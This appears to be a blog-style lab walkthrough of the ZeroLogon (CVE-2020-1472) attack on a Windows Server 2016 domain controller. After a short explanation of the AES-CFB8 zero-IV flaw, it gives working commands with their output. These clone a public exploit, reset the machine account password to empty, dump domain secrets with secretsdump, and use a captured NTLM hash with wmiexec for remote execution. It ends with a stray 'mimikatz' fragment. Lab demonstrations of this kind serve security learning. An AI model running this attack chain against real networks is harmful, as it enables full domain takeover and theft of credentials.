ZeroLogon Exploit
CVE-2020-1472, a privilege elevation vulnerability in the Netlogon Remote Protocol (MS-NRPC) which Microsoft released a patch (KB4565349) fixed in August 2020. This vulnerability was discovered by a secura security researcher Tom Tervoor on 11 September 2020. A weakness point was found on the encryption Advanced Encryption Standard – Cipher Feed Back 8 bit , (AES-CFB8) that used at the MS-NRPC to encrypt the client credential with the "Client Challenge" during the third steps of MS-NRPC. ZeroLogon, affected all the windows servers that function as Active Directory domain controllers in enterprise networks.
The following diagram is the authentication handshake process of MS-NRPC, the attack happened on the steps 3 on encrypting the client credential using the AES-CFB8.
Using the AES-CFB8 in MS-NRPC protocol has an issue on the Initialisation Vector (IV). The IV should be a random number, but MS-NRPC set a fixed IV of 16 bytes of zeros. Thus, if the client challenge set to all zeros, the probability of all zero encryption result is 1/256. It can easy to pass the step 4 validation. The attack details can be referenced to the Whitepaper by Tom Tervoor
Many PoC exploits have been released (1, 2, 3, 4, 5, ... etc)
Host Name: FKCLAI-WIN2016 OS Name: Microsoft Windows Server 2016 Standard OS Version: 10.0.14393 N/A Build 14393 Domain: FKCLAI.local Logon Server: \\FKCLAI-WIN2016
Using the RiskSense's ZeroLogon exploitation script with the latest updated of the impacket on this demo.
[email protected]:~/Documents/ctf/expoit# git clone https://github.com/risksense/zerologon.gitCloning into 'zerologon'...remote: Enumerating objects: 22, done.remote: Counting objects: 100% (22/22), done.remote: Compressing objects: 100% (15/15), done.remote: Total 22 (delta 11), reused 18 (delta 7), pack-reused 0Unpacking objects: 100% (22/22), done.[email protected]:~/Documents/ctf/expoit#
Remove all impacket scripts
[email protected]:~/Documents/ctf/expoit/zerologon# apt remove --purge impacket-scripts python3-impacketReading package lists... DoneBuilding dependency treeReading state information... DoneThe following packages were automatically installed and are no longer required:automater bdfproxy blindelephant couchdb creddump deblaze dh-python dnmaperlang17-asn1 erlang17-base erlang17-crypto erlang17-eunit erlang17-inetserlang17-mnesia erlang17-os-mon erlang17-public-key erlang17-runtime-toolserlang17-snmp erlang17-ssl erlang17-syntax-tools erlang17-tools erlang17-webtoolerlang17-xmerl fimap findmyhash funkload gconf-service gconf2-commonghost-phisher gir1.2-clutter-gst-3.0 gir1.2-gtkclutter-1.0 gir1.2-mutter-2gir1.2-mutter-3 giskismet glusterfs-common gnome-theme-kali grabberguile-2.0-libs gvfs-bin hexorbase intersect irqbalance jad kali-desktop-commonkeimpx libacl1-dev libadns1 libarmadillo8 libasan4 libattr1-dev libavahi-gobject0libayatana-ido3-0.4-0 libbfio1 libbind9-160 libboost-atomic1.62.0libboost-chrono1.62.0 libboost-date-time1.62.0 libboost-filesystem1.62.0libboost-iostreams1.62.0 libboost-program-options1.67.0 libboost-random1.62.0libboost-serialization1.67.0 libboost-system1.62.0 libboost-test1.67.0
get the latest impacket from the https://github.com/SecureAuthCorp/impacket.git
[email protected]:~/Documents/ctf/tools/win# git clone https://github.com/SecureAuthCorp/impacket.gitCloning into 'impacket'...remote: Enumerating objects: 18598, done.remote: Total 18598 (delta 0), reused 0 (delta 0), pack-reused 18598Receiving objects: 100% (18598/18598), 6.17 MiB | 1.62 MiB/s, done.Resolving deltas: 100% (14169/14169), done.
[email protected]:~/Documents/ctf/tools/win/impacket# python setup.py installrunning installrunning bdist_eggrunning egg_infocreating impacket.egg-infowriting requirements to impacket.egg-info/requires.txtwriting impacket.egg-info/PKG-INFOwriting top-level names to impacket.egg-info/top_level.txtwriting dependency_links to impacket.egg-info/dependency_links.txtwriting manifest file 'impacket.egg-info/SOURCES.txt'reading manifest file 'impacket.egg-info/SOURCES.txt'reading manifest template 'MANIFEST.in'warning: no files found matching 'tests' under directory 'examples'warning: no files found matching '*.txt' under directory 'examples'writing manife......... dding ldapdomaindump 0.9.1 to easy-install.pth fileUsing /usr/lib/python3/dist-packagesSearching for ldap3==2.5.1Best match: ldap3 2.5.1Adding ldap3 2.5.1 to easy-install.pth fileUsing /usr/lib/python3/dist-packagesSearching for Flask==1.1.1Best match: Flask 1.1.1Adding Flask 1.1.1 to easy-install.pth fileInstalling flask script to /usr/local/binUsing /usr/lib/python3/dist-packagesFinished processing dependencies for impacket==0.9.22.dev1+20200929.152157.fe642b24[email protected]:~/Documents/ctf/tools/win/impacket#
python3 set_empty_pw.py fkclai-win2016 192.168.1.169
secretsdump.py -just-dc administrator/fkclai-win2016\[email protected]
wmiexec.py fkclai/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
mimikatz Coding
